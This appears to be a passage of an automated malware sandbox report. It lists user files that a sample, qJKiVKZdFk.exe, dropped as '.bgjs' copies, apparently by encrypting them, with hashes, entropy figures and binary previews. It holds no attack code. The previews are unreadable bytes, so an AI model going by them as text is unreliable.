                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6704926169453153
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:EqYdnauviBh82qvVHC89A5QWVyQLJL8gfkox1FgeyHFgJT:piaus5uVHH6GkdlL8gcox1FTT
                                                                                                                                      MD5:A6BA3D5F26AA198013805A5D3B9AE23A
                                                                                                                                      SHA1:EF856496FB5665FF4B811BF1CE4BE1814A81D109
                                                                                                                                      SHA-256:A8F9D6F298324A60D61C3F2E9D28F79E01C22BF792EB86133C8CC0263EE020E0
                                                                                                                                      SHA-512:EFA098F4C6DD2C54B0BAA6B4F48D83EEF04E7E46F61F2426C81F25676897C3AFA34FC125115A664E6A17D2829A960862C49FE2F1C53252F01369D2B7C228237F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......!.T.&.`]m...F.Z....|.K.$.\.....c>-6hB..Z2Ya..v/..$.c.......k...=.CT?..gn.x..a..[8~....P).......U..p<..O.U..s..'....z,.t{..Hz.[zNk...S.~`.!$.s...2.......w..Mc:{..J.v.D...[@$......X.p...z.4`T.S.l....zd.z.Pr.0..U.M.../n.<.....JTFr....M.... .)...r..6......xY>k..3..0."...h ..\.1.7<.:^_.StP2.?..(46.....TIe.Np.U*..m:...b.(....$.........j$.XB.j..S...eD.....LS....Q*|..q...'.b.}..\.t..+.|{.S1.............&.4.m...4c..l...p...`D.>F.G...St.c..1......2l....D..W.8....w.C_0.k.;3...g.;..S.......%3eF.v....tW..8f....^......F./O.]..o.@a0...T....N..Bv@.u\...F0..{...&.v......3@<.`.^.M.K.~..^.3..........7..R.jbQ+..6.B..k|....<.)4.rg.....z.A...A..yu.X.z....Ta.'...2...;.J.6.r...d....X.......b.t....'2.._.\u..E..5A.kZ.9G..s...........Q...q..b...a../._......)=..1..M.IEv.".v.....l.._Z...]..L...).\{.G..=T<....&.:c.....5.qy.e.). ..pd....^..7@D.>.Q.X...}l.9...$-......|.b.%..K.!.......R4...L.<dxJ[.n..=o.<.O.I...cd..+.`1.3..F.:+.....Wf..t4"'._.-_.{.....

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\store.jfm.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.989544658853998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:5ngv3OugI0ogPJMaqFun6bTG80pazOK9rr6CM7lgpRdB:5ngvk9jhKunMG80urpagpRdB
                                                                                                                                      MD5:D2D1B3B4324C89478C8A7F36EE9068FD
                                                                                                                                      SHA1:7EF799028AAB6840D50FDAE55039B0A385188681
                                                                                                                                      SHA-256:CC0E0C485F214811C045522531C5250FC768322F36CFDD4F79E4C21EE55947ED
                                                                                                                                      SHA-512:5BE55B84502006A7B80C0CB08FC1C00624C69569CD9C747CA5F28B037EB367FC552EFF596B1CE4DC78D9A9BFE88F05221D99C4605D231A193D64CD331F1219C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..(..#..TDPF.2P.*..'.5.C....^..Zw),$,.u0~....kK..M,K...f.<[..F..k.sR.J....O..n".]..Bs..A.S|..t..u3-.`R7.5..!.(73......Sx..-....0.cH....%.&/.NM&;.5..l...*(..m.j..a.1.b..n...01.....Ze8....=.s.rWP..B...O5..p....Se4O#..[.2...u.......d=..P...(F.....Yg.NN..&..?._.....`h..v.@ibT..Dj%.._sIqW,<..m.<I.'j....a!vw.4...._...........N...i[....=.-..P.^..@P..N..d.H.`...s]..d.....|...:A;.F+.........Q..h..]>"..m..wS.v.=,pBJ+I.7.n...s......I..&.m......ww....nO......2..4P....l..;......c...q+j....R._.L.~>...y...K8..j...(....w...=8w.A......y.... .I.K.....i..2.]........u.......c.Z.Q..R..|.{V.....h.I&....Wf...mD.......P<Ch.b..^R..$.....M..A.V.N^j{.H.Z|..I\X.o...)P.f.Q..z..m..h.r.q.z...{k..A.O.EipVU<O.....\....q..m..W?......Ak.)x.%..?YH.g...\%.<....C.H.......3.:H...@...E...g'%..Lx!.7..tN ...-.N{$....%..@...gk5.}./..< aAJ. .J.......U&!tz....e..#..~m.[......`9..&........$.>.....Q.!...SL.U..b,......U.r..^O..p.......w..i/...[..BL...%.T.\ci...%'..:.,.z...........;.V>D5w..V

                                                                                                                                      C:\Users\jones\Local Settings\Comms\UnistoreDB\store.vol.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6291790
                                                                                                                                      Entropy (8bit):0.700853856400524
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:9uBDLOFFMNzpw79A5RdFsgYLjfoy0ysEGSa+d+gOrOuWxWk3m+cun4CfYjUfSUXC:9uF95RdFsNf4yvLR3b0T
                                                                                                                                      MD5:28BC6866E3A7E7273177F855983AB3D0
                                                                                                                                      SHA1:7C6FD77A6749EC625AF393FB1B7D9F94AF1C558E
                                                                                                                                      SHA-256:FB5F86B6F741032007781385969A162A92217B0AB0C3E1A24175D921388DD235
                                                                                                                                      SHA-512:4C9639793DE0B97522D6152FF8ECF613F5CAE301ECCA2A906EFD1B83BDEE30DBC1B0FB2D0C12BF519ECE44DC95878EA2E6ECD70ABC0046DECAAD21D3AEF3DD1B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:... .cI2t.EcI......$...e+YI.@..h....K..D.......D.H..%...[./;6k...V..$|.Y{a,....\q....m.c..h.E..a..v..."..9..M..5KA..l.Zwr.....3M.;7.?!..5C...h.}.~G.......Z.d....9.....Q7.._T...|...Gq.Rp..6....i.9.. P2......DG...jNK..dO......=l%.K..x/.=.....\.ruAT{{B..N......L.`.........._}.3.+.^.........Wl%.~w.kI5....d..!..09[.....k:II..&......U..S....L.....l:.O.....q.g.mV6y...H<.,.....o...Qu.xU..).........S...<.2.G....I.v.1@.m.7......hI....[=2.te.j....F..Q...4......4..D."..Y.....K....S....2........~.S.n0...'^.Z.d.U.........`O.}ci.2...!].7h..h.....G.....>..d.\...y..8.zh%.i/..+N.EGUAFq.sE'[..7.S.. .Q......iN.4.FG..."...'.......M.. .....LsB2-..C....(.t...L.......O.....F....'h.nc.>......4.6@.;.L.q...M.....$.w'..F... ..Ke..go.l.Bg.L...'Lh..K9.,$.).1/=(...../..Ds.. 7L<....J=.I.k...+o*....C....Ao...T).r...P..I. v..E.e.KU.y...Cv.......c..1.O(#.)r?#...V..j.tX..|...*.......X...a.....Y.%'.B.{\..r.^....p.._G...cn.../.`..f3T...^..U.......5.....;C.\kE.^....T...x..

                                                                                                                                      C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.9937078680550915
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:PN2o6GbvZQpPB3sYpRRlrJBMXPPIGXew/hA:IoDvC1R3JBWIGXewJA
                                                                                                                                      MD5:45BB56320F56404F8921288433FD6090
                                                                                                                                      SHA1:87C9F1268C04911239DAF4C37D552BB712B6F0F2
                                                                                                                                      SHA-256:6511EB7C3CEE2E885D37CC231D53F4B3724FB038DFED3C746E182D70A0E5EA0B
                                                                                                                                      SHA-512:41F89C1F093D3AC67E0E82C9AA3D5459640B7AFA80D2E99DA21FA378DE41B60219D7B83C6CCB1F2B2CC015E5D4D98204D6855D99221C758AF0FE00ACD37AAE30
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..|5.0...A.._.............IZ.=S......!M...I.V].)pi.7....9y...}&%....:b."...>.'..}*.......>.)......E`..<42h....`.m..f.uUE-f&1.G.Z.j..<./.|..}d.5....DLo....=,.....b...A'...].........v.D4..X4.hy.7....K..`Y..Bf..,..;..?.Y............ .......Jwf%..A..".}.._L4`P..?..~...L.U.f..4.j4...q....9...w....N1.x..m1Vl.6....U...+S...t..I...9..+...Q.q...s...`/-}..cU..|.`...9-.....\....S....-o+..}.m9...or......&..."_..\...V..."4..Sa........`......~...h.M.y>DR$..i.+...}1.........,>.(.I.n.....g./...>F.O..'+F.T...[.!yD]o..k..V...Mn........r.Ez9..X..F.....2....>4m....G5C.4g..1....u..../.....^...iC..Zg..-...%.1.f.4..T...]cg2.zD..T..=.....e.Sb;.0.P`n#i.....L..w..G..F.]s....V.u`...0......JSI.4....h..<V.Q.b.y.e...RT..SS..O.a.....{....h...&.5!wHk..Q.d..f.......@..."...g.P....n.t..|WpD_.bz.}H...3..W...p....r.:.N. !...v.[..p....u...6..%y\0D.b/o~.1a...z..sF.....{g).....Y...=.7./.H..'.....>..C.G".c..-).>D.'../.....*....# ..AZ.V.PG.m..3...!.`n..*].mK.@No..L............

                                                                                                                                      C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1048910
                                                                                                                                      Entropy (8bit):2.6692190431889875
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:HM+3ghasU3rU2XuB9YJNuPy2RKUwNoAPwRmfLvdJ/FhUO5yYU4fxQnafujHNATkA:Hb3gwGB9YJY4N2R+nbbU0fxuv6C8p
                                                                                                                                      MD5:F2A40EEAB955B83A1C981CB7FB4E756A
                                                                                                                                      SHA1:89D9B738B10B6EB3F8B21A11DC333C856714C9D3
                                                                                                                                      SHA-256:5238E80A109132C73A0916DA5D930998771FCDE1ADF762329D221322E62A55F3
                                                                                                                                      SHA-512:12C4D4D174221779EAF795B17181BAF62B48DA337E41C0FB8B33BDA8CF16D1654297378B4BAA5DA2E000FFFFCA174C9F6F5AB9716D6CE15EC209F046428ABED3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit.i:.\\j.......6X!...A.i.;g...al.J...G.r..4...($z.&o.o....L7^1+;.Z.:$....ws...vZa.>8..._X...9/..t=..b.?Mfc.CR..`GJ.1..'.X....;.e.....mN.r.Py.......a.=..D..(...V5.G..g...x..........9yc..|..da.W|D4.s.d....?..@..;....."i.m.t.:5..u{.?..oJ............/...Q.K,.1.u.gW|.V..q8.IN.=.ls*X.5D.,G.$..+o~.....u.V.|Y................}7.>G.1.?..pQ...P..,.li.L.<>.......|..j..R.~.....2.a....F..G>.z`.1..D.@.$.p...E....<..d..%Z%.h.a..?...f3=.......b.vf.=.N_..N......O...C7.8..d.....RK..........p:!.=...+y...2>...6...0....A..R...7..8.{..{.9....#.0....&r...P6...t.N..2......~..i^`.&..m....v.GVdQ.W_W..f...}n..,K...c.s.=....._.0.....O...$...W.6..$...b.4Z..1~..4BzI... x...6sn..J}....e0|...O..2.r...q.R..A>.......r.".....v.-0..[..4......isz3S..n....r_.^.5|u-.2R..O...[?...zm.wyR..e..6.;.. .....&s."y..........=o.......U..^A6`N....4..].*~........9.F.,../C.Q:|.T..X..6....g..w....a,.[l...~...L.5...j.#...ll..b)r.w......P9.....-!.F..Y.2h...b4.>...l.<..g..

                                                                                                                                      C:\Users\jones\Local Settings\IconCache.db.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):25803
                                                                                                                                      Entropy (8bit):7.991897709354727
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:4JPSWJRWNiTilG8+ch5zLA1hhCcjJNbfF5P:KPPqGimCzL+hhCMRR
                                                                                                                                      MD5:321472254C29A1B6060DD9A5583B63FB
                                                                                                                                      SHA1:7E3AF555059C4BAF52730C06A57AA6CA8A4B552D
                                                                                                                                      SHA-256:AD72A2CAA47DB42247B0EA20DE875C4AE1D055FBDFDB8E55F68CDD1219E8B586
                                                                                                                                      SHA-512:A5ABEF0C41831F88C65283F69CD85EDFDE3155294E0B69843B6C76CE2AC6EE66FB8F2DE3B9DAA787769ED099F6D876D808D863DA3834148C5B90DD8ADC2C438C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:H...W.8R......a...F...Y...-&2w...zw...7%...yN..h....O...%K..C._.........z47..j........%...n..h.t..(w...H...=..N.o.'.......8L.>..vQ{.. l....I.v.~S..L&.....t.x......j.*...F<.A..Pc...]{#..[3.v.......!...T:g..SRg..V.....p.C..........*....../..R.......R.8.z.@\8.#...3.R...Y...S......X$.j............Z./>....ZO.v.Z..Dh. 1..I .......7...Qw.s..#..z....S..]..{.W...Q.._..s[.ON.Yd..K. ..T.M.Cex.].=+..M R....C.lN......+..M.w....l..%.J<:;.!.h.\........~...6..8.t.eC._]..W.c.(....I_-..[..RN$.m4..Hz.....=....t..4..C.w.}.J....U..r.:..t.+._5..w...c...z...-.>._xy...b.R.....O.'\+.@..X....zOAZ0.{.....h.w....q.W.5.d2...Y^....{o`.....O.......3.N...>.#...E.e.U..o.|.AE..)...%w<.!....Vw],Fw..N.1....i/IA.M..W)./...Z....!.P"...z5_.........9.ha.#.N...F.....zR...P.(.?...........)u.7..}..M.u."W.w.j.N..s]......F..?....\>E..v.?.B....u.`...)....UN.f....R..{.7{...J..&.... ..)...\/.ZvT;s>.......&w....r.>T...{.&H....e.Tx-xh.z.......L.}.;j@Q.%..-.....Xd.9ArgNz_.

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\GameDVR\KnownGameList.bin.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):582670
                                                                                                                                      Entropy (8bit):5.269063237562667
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:2nVQhLN1buXrDY3jJ5/H/KT8pNbGNPLRdMlduU6/24J2:2nihB1rzrH/KAutubcJ2
                                                                                                                                      MD5:10BE330B4016700FC168D14914A1D78C
                                                                                                                                      SHA1:F80C3017833EC8EE8C24F619B31DBC65F73EA08F
                                                                                                                                      SHA-256:170F6CB33C8F354C0AC1C211B34D1B69CCD568995F04DE6F58DFBC481A57BD78
                                                                                                                                      SHA-512:9343BCF0608DC5E49CBAB624F60144BD5E2A6DCB1C87E804AC67D232678AABF076A9A4D98D97AD4C2EFF56350B7934CB257C1A3D808CE979A1345917CDF20F18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..........n'..V....U...5...!G.&...T..^.....+.Qb..'.5..x.tQ.....e...*..\8.......i....&F>~.P...3..BG...~..%.2......O.....Gc*.D(.>....5..#.V..z......-....`!(.!?..q|......-..a.K{..!#.,.<....I...6.CTtU...+....[.4..P..>..*..+...|d.~3.....O..D..a..nx..!i:..,..6^.......W.....1,.}....a3.9K.L).P.X...f;..U.NZt.V?..:..1..G..$..syD.+._<.2'.w.P..EH.I}].C..b..)...cA..dw!.6*l.*..4b...4.....,.@.fa.......e].P...U#.@....G0.%...C."m...15.....1....|..].E..8...K.....+m....,.4....U.}}K..>].>e.C\.@......qW.<.;.I...4.6gp7[el...K..S.$.U@.+zH0.U...o...F.}c.r,.K..R.d.s.s.....o....`.Qrvb..-..p...8sj5..q{..%x.X.....pk....Q...&.....[..?).=.`.w...k+..a..I.G...+<..e.ueM...K.=......./9.G9.,P2......@v..s.nZR....D.,.j.]....w...j}A'.J.r.Txz..#.(..|...!..0o.......07..x.P.!...........j.../l.......`..Hb...5'.V9..aD.H]*b....:.zB..B..,....b..h........l...x......%...'.?.=......E..Y."1.$.......,.. .J....#|t.....Q.......bi..0....8..$:Kv...].2(...(9..b...1....C8>.[......*......N.

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Internet Explorer\brndlog.txt.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6906
                                                                                                                                      Entropy (8bit):7.973387371410013
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:qPuCg3ZdDZhmB0VwaScxuP/p0YugCbGQ154:qPGdDG+ZSAAjGD4
                                                                                                                                      MD5:B46981C7B7C35CA83A6DAA9120B6D9C2
                                                                                                                                      SHA1:209329012910885B100EB52D1A6398F39B0F828E
                                                                                                                                      SHA-256:8250C2A8AC46711FAEE9474668CB8CCB714CDE89800041BBC7D7E04F9C8FFEAC
                                                                                                                                      SHA-512:7D6EA6106FC00DA44A2B7F1C89FC81E16EF6A0A0360B284021DD911F4B3AF184419B5C40373BA71D49B22B8BF8AF08ABB414D46BC7DC107440E2809333896A94
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:10/03.<.%"[4...j.&k&...d.UY.%T7....O...6.Y.....z ..`z.....i.p....X..{...`<..d.y.~.....'.F..D..aU.i.:. ..L..".A*i.E.....>.qV.:&V.1...p.E........0.)...A.0Z1.*.{"...,F.2r....bE..g.....S..S..Y...../.M......I.2y...Y.6...^o,MDV.I.qa.<9...&I..l....).\LH.Q....~..7M@.e..]kK.....?D..Yqp.'\}..c..]....d+.;o..M...tZ^=.[\.t.*6;3...aI.....!...N^.....s....A..^90T....J.......TB.....I......Z.\....^b..........\.i.?Z...6..%w....R...V.....t..E;...lj..Xyn>:.).p*.....Z.!:...OqGT.p./.5.^.I.Tz..q...."..U}..q....6Ro..s....U.|.Q...<E^....%.D{.cg[..#(kd...`..~6.........,(.J...a$w...P._.!.(?t.>)..uH........b.{R.....97.8Y>.r...6V.T...P...\.....v.!%.E.2.CQ,...{.z.......L..7zC-...9.i.B..x..j.....ga.../..'.D.O.Q .<F..o.j.^nz....%.C.!.....<./....-A..T.y.....v.Y.)8..f....5(m....m...,I..~.9.X"..;.....&.td.!.,aF........]]...1..fO..p....K.&v\..T).....o........`.........*fK...[.\!:."...k..=....5..uO+.-..eDpU.1S..R...{.4?.....O..[._..>...wD...Z......c...3.......9./...W..81..........

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):834
                                                                                                                                      Entropy (8bit):7.75687558736374
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:QG9fRE8an/RURkOr4ldJLjt2lMtwwLVSIZYYoUHfU9/fpfPxuLTE//Lm0Mn1noJt:Q0pzRkO81sYImU93LcTQxuBWPbD
                                                                                                                                      MD5:B2A02010210A146DE4F2552156535B53
                                                                                                                                      SHA1:2DEC3990E291F01C3EDAF295024C365C7EFECAB3
                                                                                                                                      SHA-256:AA3C9573E9331CE35263F1AF8E633CC3C7A0F2A9D91BA6B6E8E5D0F132A7CBB2
                                                                                                                                      SHA-512:6DD02BFB3018AE0725CDFE29CB9AF3A184A627F8771A9B08EE0587EE5782DEC472D101CA0877293DC245C3BED146E07F5517D60FB04BC94297EE7E81E94A088D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.06.U.A.L.. t.|.4P...R).V......0.2........6..+/.4%.c....S_K@j.T....dum.....~.h&.?.T...B..P~.b.J:...P........XzI..[A.?.X.C..X...Z......E .v^......j...u_....a.5/|.....FN..';....~.D..N.wS..3B.G7O...G..,X..0...;..ADL.M.YZ.:.....uZ..mL...I...._[v..MO5...2J....l...?..j..\.cEB#=f..i..N`&...Y...9.....z.@.Rg.......e..Zfh'.M.v.2..,..U....(..V..~y....P.'C"..%~...@....#=..-.A ....l.]..C...3..wO.P_.`f.,..kc..A..N...\..J..W....KPV.b...)....}..\.'?{.....'..r.+..J)[D..ahHu...y.I.....a.......q.F+!./a....`..,../......(+.....G.A.PC...&~.(..,.UFb......k..g\a..Ma.r...g....^.[.c.V..=g$x..."7....t.m.z..9...E.5..4.=.V...j.1......h..;t.. ...U\i...]..x0.X..2...3....c.N[.k.vz=S..,x=....@..?..y.D..?..D.E..k,....4f...'..Qm..o--#...5..<.U.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1740
                                                                                                                                      Entropy (8bit):7.902392333696196
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m4wZZgM4jAwBbcdUhJesajFbhBf37PoshoD:m4wgFBIKhJez7Pl6
                                                                                                                                      MD5:AC61BB5F174974A12906CF314BBF04E5
                                                                                                                                      SHA1:2EB5583F5324240714B50FBAD986977028A45640
                                                                                                                                      SHA-256:1B7CFDB1CCACE0B1868A50E5C95931EA893538052A7E29908ABC2F3623E4D316
                                                                                                                                      SHA-512:5AB23625E19B1757AFFE39C56539681D8A0C89D460808CFDE6C369894C464CBC6A920288D5F02A1FCB3660068F5F27EBA2A2771D109EBD16167D7EC1F3052AC3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..1.0...e1...}*.;/..~j.>W"u.gVg..=.._.#..[n.@$...^N.d=....v..#.z1.K...g.Y...f.....8..m.+~...v....e...3K.].,.[.-.E....K.l.._..7.......,.X..f.x>....F...s..A.}.r...,.P6....>..G...<.....>..7..Oa:pS8...X....4...N......d.[."..Q,k...-(.mS....r..0.....|o.W..,...s#PCi~...F.@......d...3...I..$.G..cQ..j.%.AU...*.......57'.i!.>....9...E_.'M.!u....Q.?`.../z>3..VE...f..Z...;.....pU...7.;`....j9..I........82..K.fO..,......\.lN.............f,..j......Z......lU.%....79-.%..........._B......(.e.AU.`.PH]......DJ.D.$.#bTD..F.............B-O3l*.U...'.<...&...BJ.C..;...j...G.1.5.|.5Fb.g......A?.i.I..!.gz.Q..O...(....T..........|....&........Oa..S.%MCZ........+.TSq..H.f\.aPF.e.#...F1.0..h.}.mz..".......z.....p&.....{6s.R..*zB....(...<.....:d....E.'f.....dp.X.N..\....G...d..s..............".EA...4.N.V.`.f]...W....yj.....~.'.U)]....`.. ...1$R.X....*..fG.......{.....R...Y.....;.V.Yz....S..NzRh.<O...p..6~.I.S.yoi.p..`....Aal.......@._M\....P..,.C...h.b.A..$l#...+.I.t3f`z..y..

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1353
                                                                                                                                      Entropy (8bit):7.860939471295033
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YMSvuROu6cLrsRlmBE7jNBel2qX6N49o2iLKOd1BmLIo7dX7KSCLUbD:Y/QyOrsRlX7je2q+bP/vmL1dX7++D
                                                                                                                                      MD5:C851F459A499D1FDED6326FCEBC7E2C7
                                                                                                                                      SHA1:ADC81B95F27555B3A271BDA66509B57CFEECF6C1
                                                                                                                                      SHA-256:7ACF023149CA4B7651DC1B9AC20FC6328ABE1440839358C779811A3FA782513F
                                                                                                                                      SHA-512:F45C51C7AB37A731B4CBBA19030857C16EE46DD6C1F0F1F7B722E2A6144450CC87BBA4B370FF7A8EF2C247C652DE82A45D7E0C9CA9DB8A61ED470C57FA702E20
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"Rec.e.{...%t...O..9.s2..U.....+?.%.W..&LQD..U.>L#D#*..!...l..X..^.r.>..at.].. \.s...!..BZ.....YU....`-q..r.%...G...L.. ..C..K*...,..k.|=....Z.........S....xhjj....y..U.j.&w`no.....:...j..`F$...C.R:EFr.f....m=........r.|..3.........N.0.BX._0/.kxZ...CD.7..).m.s....A0Q4L.......`.....>.s..{..m.._..y.....|...A..FJ.T....H@P.......?@.Ln}h...;qu......_.OO....n...p.f..5<..)...MMz....^..EC......V.r.=..~'..J&QOzTXu.LB..Z..S.\.}...fK.??.$..)Z..7...f".H0.f..jLo.i.}.W.....*d....x-..1,.V..k.%...z0.......1'...NjL......\I<.`.K.3..M...w_Z..`.3/...K)..=T.\0...X..*......@..p.\i.....fe/F...m.....chc(6.N....bI_.p..H..u..M.....).E.q.Q.=S...:.1........JF.=t.........,{'}(3..p..L...<.6>...5&....u.T...??..pm.P5.>...._.IQ.A..D..W......6R.... .....'/.%.I..f^..MT...bJ1.=:....47.......+0......\|.-.-..G..R.[.s...l-...f..=.....[K..5.....6...;- .Jp.9......t..>Z9.1W].A...p..8d.a=.T..\T.}..v.r.Z(..<..P0....... !..B.o]>.....p.A...S.......*..V...:...uY....!.

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):865614
                                                                                                                                      Entropy (8bit):4.098373467353712
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:s6X0sy48YCN5Hi0Jwq412ZZJC6JZ2yfZyWeI4VTZZZZJC6JZ2kZZZJC6JZ2zrZZ/:V0U815i4wqv
                                                                                                                                      MD5:0AD0A7360DCFDD2ADB3681FE5D39B86C
                                                                                                                                      SHA1:3687D709884527DC52A3027BC5007BC0D8445A61
                                                                                                                                      SHA-256:13E150AFD32E50199D6120EADD4CC4EBDB282EBF2C0AD1637F3EEACA7734182C
                                                                                                                                      SHA-512:521967A83A8A7B9628AB55AABF24DF839DC19062B83DC50B8D8E0463CCF5B88069B9EC592607B1976B9AD44E6F5DEDD7889660E4F9D65D067C02B963AF4083AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regfC...-s..O....7.J..xj..d...F..XZ..3...EW.".8...5.5.3.@L....[..|b.m..]......y..h..f.VY.?Wjh.t......9.S.k...3..T......Pp..A....d..5%Fj.......=..I.k`U{..V...\..4.E^.....10D..H!..,b..*.6.C.%O...Gm...Y..D.j%.r.S...D..\H.n.....=..,bx..6...i...J.*.Uti.........A..u...c.....9....l............g.t2.........AR~wAB>.kf4..N....k.2&WDtdF.......X.F{..%z.<.4>R.z.*.Cc.G..(.GV..[..(.c...a...LkK`.!B;.|...>y$..JS....i.Gc.o.u...t.n....R..@/l.D.^...".<(..j...{;.>.?..Suj.<e.K.. ....)z>..#h.fb9.e..o..9..I...T.p/.O..UB;.O6r......Y<(.....1.^.p.Oa....\+.X=.7.......#.t.?2...f\..3... lL.7...l.....I.....`ID..M.IA#.....?Q.g. Kt&86...d..A..........~oz..1 ._.1A./l.G.. .....K...^....$.;.=....#...r.h-H..b.;..O.mj.vC'..O...-.s...+eR..`.... y.;:;...../|]...,.$.(ubk.^......h(...cC.....f=S?..,.aN...y.T.%...Z..b.w....t.?..1.F...F.oh{P...U.....s'YQ.Az.@..0....!..=....j.......^.qs.dxh...9.c._.R.."....d..]X...a}d.D...so.D2e.|X....t2.4.+DI.I.2..4?_....j........6.......D.K.=).u.

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.LOG2.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):865614
                                                                                                                                      Entropy (8bit):4.813923173865946
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:TZkmvVrsfUrd/9jvpxoJg26scpbJ6JZ2CM2C6JZ2h:TZkgrsfU59vpe5UJ6JZ2CM2C6JZ2h
                                                                                                                                      MD5:A860F3F6A29DD2A8EA0BFB26F29FA907
                                                                                                                                      SHA1:BE12331040C8447ED3CB129A03F756994283F048
                                                                                                                                      SHA-256:7F4C1A484A5BCBD6B45195F55D574FDED6D30F41DCFD07433D00263DBFFDA81D
                                                                                                                                      SHA-512:A2283C575FADEAE7B7749173F7B6F16C2EC5CA24D0D3928B73A29AD548F72F7C815AEEB973F9ED61A06AB5D9FD99E498FD2C8572B0A071F8AC6178973D93EA6A
                                                                                                                                      Malicious:false
